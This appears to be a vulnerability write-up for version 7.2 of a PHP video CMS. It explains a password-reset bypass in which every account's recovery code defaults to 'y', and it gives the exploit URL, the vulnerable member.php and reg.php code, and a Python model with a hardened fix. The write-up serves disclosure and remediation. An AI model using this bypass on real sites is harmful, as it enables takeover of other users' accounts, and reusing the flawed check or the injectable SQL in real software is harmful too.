Affected version: v7.2
Reproduction:
Register a user and use the "forgot password" function. After the e-mail verification succeeds, the response contains a reset-password link.
Reset-password link (screenshot)
The link carries a verification code (repswcode), but the CMS has a flaw: the code is initialised to the fixed value y for every account. So change repswcode to y and repswname to another account, yhy2, and the password of that account is changed successfully:
http://localhost/member.php?mod=repsw3&repswcode=y&repswname=yhy2
From the code side: the password-recovery source does not reset the password purely on the supplied username, there is an authentication check, but the check is flawed:
/upload/member.php
if($mod=='repsw3'){
require_once('data/admin/smtp.php');
if($smtppsw=='off'){showMsg("抱歉,系统已关闭密码找回功能!","index.php",0,100000);exit();}
$repswname=$_GET['repswname'];// target account, attacker-controlled
$repswcode=$_GET['repswcode'];// recovery code to compare, also attacker-controlled
if(empty($repswname) OR $repswname==""){showMsg("授权码错误或已过期!","index.php",0,100000);exit();}
if(empty($repswcode) OR $repswcode==""){showMsg("授权码错误或已过期!","index.php",0,100000);exit();}
$row=$dsql->GetOne("select * from sea_member where username='$repswname'");
$repswcode2=$row['repswcode'];// stored code: still the registration default 'y' unless a reset was ever requested
if($repswcode != $repswcode2){showMsg("授权码错误或已过期!","index.php",0,100000);exit();}// only check before the reset form is shown
echo <<<EOT
<body>
<div class="hy-head-menu">
<div class="container">
<div class="row">
<div class="item">
<div class="logo hidden-xs">
<a class="hidden-sm hidden-xs" href="index.php"><img src="pic/member/logo.png" /></a>
<a class="visible-sm visible-xs" href="index.php"><img src="pic/member/logo_min.png" /></a>
</div>
<div class="search hidden-xs">
<form name="formsearch" id="formsearch" action='search.php' method="post" autocomplete="off">
<input class="form-control" placeholder="输入影片关键词..." name="searchword" type="text" id="keyword" required="">
<input type="submit" id="searchbutton" value="" class="hide">
<a href="javascript:" class="btns" title="搜索" onClick="$('#formsearch').submit();"><i class="icon iconfont icon-search"></i></a>
</form>
</div>
</div>
</div>
</div>
</div>
<div class="container">
<div class="row">
<div class="hy-member-user hy-layout clearfix">
<div class="item">
<dl class="margin-0 clearfix">
<dt><span class="user"></span></dt>
<dd>
<span class="name">正在找回您的密码<span>
<span class="group">通过电子邮箱找回您的密码<span>
</dd>
</dl>
</div>
</div>
<div class="hy-member hy-layout clearfix">
<form action="?mod=repsw4" method="post"><li class="cckkey"><strong>会员账号:{$repswname}</strong><br><br>新密码:<br></span><input type="password" name="repswnew1" class="form-control" id="repswnew1" value="" style="width:250px;"><br>确认新密码:<br></span><input type="password" name="repswnew2" class="form-control" id="repswnew2" value="" style="width:250px;"> <br><input type="hidden" name="repswname" id="repswname" value="{$repswname}"><input type="hidden" name="repswcode" id="repswcode" value="{$repswcode}"><input type="submit" name="cckb" id="cckb" value="提交" class="btn btn-warning"></li></form>
</div>
</div>
</div>
<div class="tabbar visible-xs">
<a href="/" class="item">返回首页</a>
</div>
<div class="container">
<div class="row">
<div class="hy-footer clearfix">
<p class="text-muted">Copyright ©{$year} {$_SERVER['HTTP_HOST']}</p>
</div>
</div>
</div>
</body>
EOT;
exit();
}
The INSERT statement on the registration page shows where that default comes from: when a user is created, the repswcode column is initialised to the fixed value y for every account (the second-to-last value in the VALUES list), so any account that has never gone through a reset will accept repswcode=y:
/upload/reg.php
$dsql->ExecuteNoneQuery("INSERT INTO `sea_member`(id,username,password,email,regtime,regip,state,gid,points,logincount,stime,vipendtime,acode,repswcode,msgstate)
VALUES ('','$username','$pwd','$email','$dtime','$ip','1','2','$regpoints','1','1533686888','$dtime','$acode','y','y')");
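The following Python model is an added example, not code from the CMS or from the original write-up. It reproduces the logic of the two passages above (the repsw3 comparison in member.php and the repswcode='y' default set by reg.php) against an in-memory dictionary that stands in for the sea_member table, shows why the attacker's guess of y passes, and places a hardened version of the same check beside it. The function names, the TOKEN_TTL value and the hashed-token storage are assumptions of this example, not the project's API.

```python
import hashlib
import hmac
import secrets
import time
from urllib.parse import urlencode

# Constructed stand-in for the sea_member table (a dict keyed by username).
# reg.php inserts repswcode='y' for every new account; that is the root cause.
DEFAULT_REPSWCODE = "y"
TOKEN_TTL = 30 * 60  # assumed lifetime of a reset token, in seconds


def register(members, username):
    """Mimics reg.php: every new row gets the fixed recovery code 'y'."""
    members[username] = {"repswcode": DEFAULT_REPSWCODE}


def repsw3_vulnerable(members, repswname, repswcode):
    """Mimics member.php mod=repsw3: compare the GET parameter with whatever is
    stored in the row. For an account that never requested a reset that is
    still the registration default, so the attacker passes with 'y'."""
    if not repswname or not repswcode:
        return False
    row = members.get(repswname)
    if row is None:
        return False  # $row['repswcode'] is NULL in PHP, 'y' != NULL fails closed
    return repswcode == row["repswcode"]


def bypass_url(base, victim):
    """The request from the write-up, parameterised on the victim's username."""
    return base + "/member.php?" + urlencode(
        {"mod": "repsw3", "repswcode": DEFAULT_REPSWCODE, "repswname": victim})


def request_reset_fixed(members, username, now=None):
    """Hardened issue step: a fresh random token per reset request, stored only
    as a hash together with an expiry. The plaintext token goes into the e-mail
    link and nowhere else. Accounts that never asked for a reset hold no token."""
    now = time.time() if now is None else now
    token = secrets.token_urlsafe(32)
    row = members[username]
    row["repswcode_hash"] = hashlib.sha256(token.encode()).hexdigest()
    row["repswcode_exp"] = now + TOKEN_TTL
    return token


def repsw3_fixed(members, repswname, repswcode, now=None):
    """Hardened check: no outstanding token means no reset, expired tokens are
    rejected, the comparison is constant-time, and a token is single use."""
    now = time.time() if now is None else now
    row = members.get(repswname)
    if row is None or not repswcode:
        return False
    stored = row.get("repswcode_hash")
    if stored is None or now > row.get("repswcode_exp", 0):
        return False
    presented = hashlib.sha256(repswcode.encode()).hexdigest()
    ok = hmac.compare_digest(presented, stored)
    if ok:
        # Burn the token so the link cannot be replayed after one use.
        row["repswcode_hash"] = None
        row["repswcode_exp"] = 0
    return ok


if __name__ == "__main__":
    db = {}
    register(db, "yhy2")  # the victim from the write-up
    print("vulnerable check with repswcode=y:", repsw3_vulnerable(db, "yhy2", "y"))
    print("attacker request:", bypass_url("http://localhost", "yhy2"))
    print("fixed check, no reset requested:", repsw3_fixed(db, "yhy2", "y"))
    tok = request_reset_fixed(db, "yhy2")
    print("fixed check, guessed y:", repsw3_fixed(db, "yhy2", "y"))
    print("fixed check, real token:", repsw3_fixed(db, "yhy2", tok))
    print("fixed check, token replayed:", repsw3_fixed(db, "yhy2", tok))
```

Note that changing the INSERT alone is not enough: every row created before the fix still carries repswcode='y', so the stored defaults must be cleared (set to NULL or an unguessable value) as part of the upgrade, and the same check must also be applied in the mod=repsw4 handler that actually writes the new password, not only before the form is rendered.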